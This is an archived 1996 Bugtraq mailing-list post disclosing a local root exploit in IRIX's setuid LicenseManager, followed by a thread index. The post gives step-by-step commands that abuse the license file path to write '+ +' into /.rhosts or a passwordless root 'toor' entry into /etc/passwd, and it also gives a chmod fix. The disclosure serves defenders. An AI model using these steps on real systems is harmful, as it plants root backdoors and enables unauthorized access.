Bugtraq mailing list archives
Irix: root exploit for LicenseManager
From: volobuev () t1 chem umn edu (Yuri Volobuev)
Date: Tue, 19 Nov 1996 13:30:19 -0600
Hi there, For your convenience, a new, fast, reliable way to get root on your local SGI is given below. It works on Irix 5.3 and 6.x with license_eoe.sw.license_eoe installed, which I believe is default (I found it installed on several independent Irix installations). 5.2 doesn't seem to have it. This exploit was made possible by developers who make big, fat programs like LicenseManager suid. Short background: LicenseManager is GUI to license subsystem. It allows to install/remove/update FLEXlm and NET_LS licenses. Any regular user with access to X screen can run it, and it's suid. It will allow anyone to install licenses, and will prompt for root password if one wants to remove one. And that's about all protection it has. % setenv NETLS_LICENSE_FILE /.rhosts % /usr/etc/LicenseManager & Install... NetLS Node-locked Vendor Name: whatever Vendor ID: + + Product name: whatever License version: 1.000 License version: Expiration date: 01-jan-0 (in license version field I put space) Apply License(s) succesfully installed % cat /.rhosts #:# "whatever" "whatever" "1.000" "Incomplete" + + If your system has remote root logins disabled, replacing /.rhosts with /etc/passwd and + + with toor:0:0::/:/bin/sh will be helpful. How to fix: chmod -s /usr/etc/LicenseManager Comments: This whole thing makes me feel bad. There are genuine exploits, there are smart ones and lame ones. This one is superlame. Hacking suid program like LicenseManager is like stealing a milk bottle from a newborn, while baby's sleeping, parents are out of town and babysitter's in the bathroom. It is extremely well known that suid programs are very dangerous. It doesn't take a lot of knowledge to figure that suid program that big is vulnerable in zillion ways (and it is, I've just shown one of many). It's just not suitable to be suid because it does no sanity checks whatsoever. So why is it suid? Somebody wanted to make Irix GUI more user-friendly. Really, why not allow people to install licenses without bothering to su first? Alas, this is a clear case where security is sacrified in favor of (very questionable) ease of use. With all due disrespect, even Microsoft doesn't do things like that so easily. I notified SGI, but haven't heard back from them. have fun, yuri --- This message reflects my personal opinion, not my employer's
Current thread:
- Re: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)., (continued)
- Re: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Kari E. Hurtta (Nov 17)
- Re: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Alan Brown (Nov 17)
- Digital Unix v3.x (v4.x?) security vulnerability Eric Augustus (Nov 16)
- Re: Digital Unix v3.x (v4.x?) security vulnerability hj () globecom net (Nov 17)
- Re: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Bryan Reece (Nov 17)
- Re: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Simon Karpen (Nov 17)
- Magic password of some linux-box(Hardware..) Seo Euiseong (Nov 17)
- rplayd on HPUX 10.1 Henrik P Johnson (Nov 19)
- Re: BoS: Magic password of some linux-box(Hardware..) Sergiu Popovici (Nov 19)
- Re: BoS: Magic password of some linux-box(Hardware..) Sergei A. Golubchik (Nov 19)
- Irix: root exploit for LicenseManager Yuri Volobuev (Nov 19)
- Re: BoS: Magic password of some linux-box(Hardware..) moost () xs4all nl (Nov 20)
- Ascend Killer Program Aleph One (Nov 17)
- Serious hole in Solaris 2.5[.1] gethostbyname() (exploit included) Jeremy Elson (Nov 18)
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit Craig Raskin (Nov 18)
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit Paul B. Henson (Nov 18)
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit Russell Street (Nov 18)
- ALERT: Solaris 2.5.1 locks up on TCP connections in Pine 3.9x Todd Vierling (Nov 18)
- Re: ALERT: Solaris 2.5.1 locks up on TCP connections in Pine 3.9x Brian Harvell (Nov 20)
- Digital Unix v3.x (v4.x?) security vulnerability Eric Augustus (Nov 16)
- ssh w/ solaris 2.5.[1] Aleph One (Nov 18)
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit Mike Battersby (Nov 18)